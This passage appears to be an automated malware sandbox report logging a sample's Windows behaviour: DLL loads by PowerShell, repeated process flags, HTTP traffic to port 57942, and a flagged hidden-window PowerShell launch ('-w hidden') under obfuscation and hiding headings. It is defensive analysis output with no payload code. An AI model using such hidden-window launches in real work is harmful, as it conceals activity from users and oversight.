      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior

      Data Obfuscation

      barindex
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 57942
      Source: unknownNetwork traffic detected: HTTP traffic on port 57942 -> 49704
      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 57942
      Source: unknownNetwork traffic detected: HTTP traffic on port 57942 -> 49705
      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 57942
      Source: unknownNetwork traffic detected: HTTP traffic on port 57942 -> 49707
      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 57942
      Source: unknownNetwork traffic detected: HTTP traffic on port 57942 -> 49707
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
